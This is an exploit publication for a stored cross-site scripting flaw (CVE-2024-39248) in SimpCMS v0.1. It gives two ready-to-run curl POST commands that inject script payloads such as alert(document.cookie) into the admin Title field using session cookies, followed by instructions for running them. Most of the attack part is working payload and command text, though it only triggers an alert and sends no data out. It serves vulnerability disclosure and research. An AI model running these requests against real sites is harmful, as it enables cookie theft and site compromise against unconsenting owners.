Publication for Cross Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php## Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
## CVE: CVE-2024-39248
## Exploit Author: Jason Jacobs (0xjason_jacobs - Twitter)
## Vendor Homepage: https://sourceforge.net/projects/simpcms/
## Vulnerable endpoint: /SimpCMS/admin.php
A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows
attackers to execute arbitrary web scripts or HTML via a crafted
payload injected into the Title field at /admin.php.
### Updated cURL command parameters for the SimpCMS version live on SourceForge:
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:
> curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=<script>alert(document.cookie)</script>&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"
### Parameters from the initial CVE submission (Same exploit works):
The initial parameters observed for the SimpCMS software resulted in the following cURL command but was later updated:
> curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explanation:
> - curl: The command-line tool for transferring data with URLs.
> - -X POST: Specifies the request method to use (POST).
> - "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
> - -d "title=<script>alert(document.cookie)</script>&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - The POST request payload.
Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.
CWE: https://cwe.mitre.org/data/definitions/79.html
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view